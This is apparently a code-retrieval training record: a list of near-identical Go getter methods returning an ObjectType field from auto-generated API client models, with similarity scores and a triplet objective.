*IamServiceProviderAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *ApplianceGroupOpStatus) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *HyperflexServerFirmwareVersionEntryAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *EquipmentIoCardBase) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *WorkflowSshCmdAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *HyperflexSnapshotStatus) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *OpenapiTaskGenerationResult) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (t *TextMatch) GetObjectType() string {\n\tif t == nil || t.ObjectType == nil {\n\t\treturn \"\"\n\t}\n\treturn *t.ObjectType\n}", "func (o *StorageHitachiPortAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *EquipmentLocatorLed) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *StorageBaseCapacity) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *BulkResult) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *AssetNewRelicCredential) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *EquipmentIdentityAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *WorkflowServiceItemInputDefinitionType) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *HyperflexVirtualMachineAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *NetworkLicenseFile) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *IamLdapProviderAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *StorageSasExpander) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *OpenapiProcessFileAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *ResourcepoolPoolMember) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *HyperflexMapClusterIdToProtectionInfoAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *EquipmentBaseSensor) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *SoftwarerepositoryLocalMachineAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *OnpremUpgradePhase) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *NiaapiNewReleaseDetailAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *NiatelemetryNicc) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *SoftwarerepositoryCategoryMapper) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *StorageVdMemberEpAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *SdwanRouterNode) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *FabricFlowControlPolicyAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *InventoryBase) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *UcsdBackupInfoAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *ConnectorpackUpgradeImpact) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *HyperflexEncryption) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *ConvergedinfraServerComplianceDetailsAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *NiatelemetryMsoTenantDetailsAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *StorageEnclosure) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *HyperflexHealthCheckNodeLevelInfoAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *EtherPhysicalPort) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *StorageFlexUtilVirtualDrive) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *ConnectorXmlApiMessageAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *StorageRemoteKeySetting) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *MacpoolLeaseAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *WorkflowServiceItemActionInstance) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *WorkflowSolutionActionDefinition) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *VirtualizationVmwareVirtualMachineAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *NetworkDns) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *NiatelemetryNveVni) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *WorkflowBuildTaskMeta) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *IamUserPreferenceAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *VirtualizationIweClusterAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *StoragePhysicalDiskAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *KubernetesAddonDefinitionAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *IamLdapConfigParamsAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *OnpremUpgradeNoteAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *TechsupportmanagementEndPointAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *HyperflexHxapDvUplink) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *NiatelemetryDigitalOpticalMonitoring) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *IaasMostRunTasksAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *IppoolPoolMember) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *FirmwareSwitchUpgrade) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *MemoryPersistentMemoryNamespaceConfigResult) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *StorageNetAppCloudTargetAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *StoragePhysicalDiskExtension) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *IaasDeviceStatusAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *NiatelemetryNexusDashboardsAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *ApplianceDeviceClaimAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (p ObjectID) ObjectType() ObjectType {\n\treturn ObjectType(p.number >> 48 & 0x00ff)\n}", "func (o *StoragePhysicalDisk) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}" ]
[ "0.8064303", "0.80389327", "0.8024575", "0.80201006", "0.80090237", "0.8008541", "0.800107", "0.79988265", "0.7990987", "0.797955", "0.7976957", "0.79595536", "0.79592043", "0.7958709", "0.7956991", "0.79490685", "0.79453945", "0.79251486", "0.79247314", "0.79147816", "0.79133725", "0.7909199", "0.7908785", "0.79062927", "0.79049534", "0.7899097", "0.7898608", "0.7898595", "0.78921926", "0.7890769", "0.7889345", "0.78858256", "0.7882527", "0.7879947", "0.7879394", "0.78786135", "0.7877965", "0.7873346", "0.78673863", "0.7864001", "0.78629345", "0.78571963", "0.7852011", "0.7851875", "0.7848983", "0.7848274", "0.78392816", "0.7834779", "0.783237", "0.7832182", "0.7832039", "0.7831026", "0.78291494", "0.78273773", "0.78226286", "0.7821289", "0.78207266", "0.7819619", "0.78171563", "0.7812898", "0.7810479", "0.78027713", "0.7800578", "0.78000337", "0.7786574", "0.77855676", "0.77848715", "0.77807355", "0.7776081", "0.7774195", "0.7770203", "0.77658737", "0.77620894", "0.7760581", "0.77576536", "0.77576154", "0.7743991", "0.7742865", "0.77396137", "0.77296287", "0.77213895", "0.77209383", "0.77143186", "0.77131146", "0.77117336", "0.76954335", "0.76900136", "0.7680957", "0.76783496", "0.7676867", "0.767379", "0.7657077", "0.76548254", "0.76508063", "0.7646997", "0.76427996", "0.7630365", "0.7626311", "0.76239395", "0.7617913" ]
0.7636991
96
GetObjectTypeOk returns a tuple with the ObjectType field value and a boolean to check if the value has been set.
func (o *CloudAwsVirtualMachineAllOf) GetObjectTypeOk() (*string, bool) { if o == nil { return nil, false } return &o.ObjectType, true }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (o *WorkflowCustomDataProperty) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *HyperflexSnapshotStatus) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *EquipmentFanControl) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *HclFirmware) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *HyperflexEncryption) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *ApplianceGroupOpStatus) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *WorkflowWorkflowDefinitionAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *StorageRemoteKeySetting) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *FeedbackFeedbackPost) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *AssetNewRelicCredential) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *WorkflowSshCmd) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *EquipmentFanModule) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *ComputeBladeIdentityAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *HyperflexReplicationPlatDatastore) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *HyperflexHealthCheckPackageChecksum) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *ServerConfigImportAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *NiatelemetryNicc) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *StorageNetAppHighAvailability) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *WorkflowServiceItemInputDefinitionType) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *IamUserPreferenceAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *WorkflowSshCmdAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *VirtualizationIweHost) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *WorkflowBuildTaskMeta) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *NiatelemetryNveVni) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *NetworkDns) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *WorkflowSolutionActionDefinition) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *CloudInstanceTypeAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *IamLdapBasePropertiesAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *WorkflowCliCommandAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *VirtualizationIweVirtualMachine) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *HyperflexSoftwareVersionPolicy) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *RackUnitPersonality) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *OsInstallAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *ForecastModelAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *NiatelemetryDigitalOpticalMonitoring) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *FabricFlowControlPolicyAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *IamLdapConfigParamsAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *FirmwareHttpServer) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *ConnectorpackUpgradeImpact) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *StorageSpaceAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *ApplianceSetupInfoAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *ResourcepoolPoolMember) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *IaasDeviceStatusAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *WorkflowServiceItemDefinitionAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *StorageEnclosure) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *OnpremUpgradeNoteAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *HyperflexClusterHealthCheckExecutionSnapshot) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *FcNeighborAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *WorkflowCatalogServiceRequest) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *IppoolPoolMember) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *HyperflexVirtualMachineAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *HyperflexMapClusterIdToProtectionInfoAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *IamServiceProviderAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *WorkflowServiceItemActionInstance) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *ConnectorXmlApiMessageAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *EtherPhysicalPort) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *FirmwareSwitchUpgrade) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *StorageExternalParityGroupAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *EquipmentLocatorLed) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *InventoryBaseAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *KubernetesPodStatus) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *EquipmentIdentityAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *HyperflexVmSnapshotInfoAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *KubernetesDaemonSetStatusAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *EquipmentBaseSensor) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *VirtualizationVmwareVirtualMachineAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *MacpoolLeaseAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *NetworkLicenseFile) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *ConvergedinfraServerComplianceDetailsAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *OpenapiTaskGenerationResult) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *StorageVdMemberEpAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *OnpremUpgradePhase) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *UcsdBackupInfoAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *MemoryPersistentMemoryConfiguration) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *StorageBaseCapacity) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *StorageNetAppSnapshotPolicySchedule) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *EquipmentIoCardBase) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *InventoryBase) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *CapabilityChassisUpgradeSupportMeta) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *StorageHitachiVolumeMigrationPair) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *ApplianceDeviceClaimAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *NiatelemetryMsoTenantDetailsAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *StorageHitachiPortAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *NotificationAccountSubscriptionAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *MacpoolPoolMemberAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *KubernetesAddonDefinitionAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *NiaapiRevisionInfoAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *IamLdapProviderAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *HyperflexServerFirmwareVersionEntryAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *StorageHitachiParityGroupAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *NiatelemetryVpcDetails) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *EtherHostPort) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *HyperflexHealthCheckNodeLevelInfoAllOf) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *StoragePhysicalDisk) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *StorageFlexUtilVirtualDrive) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *MemoryPersistentMemoryNamespaceConfigResult) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *KubernetesContainerRuntimePolicy) 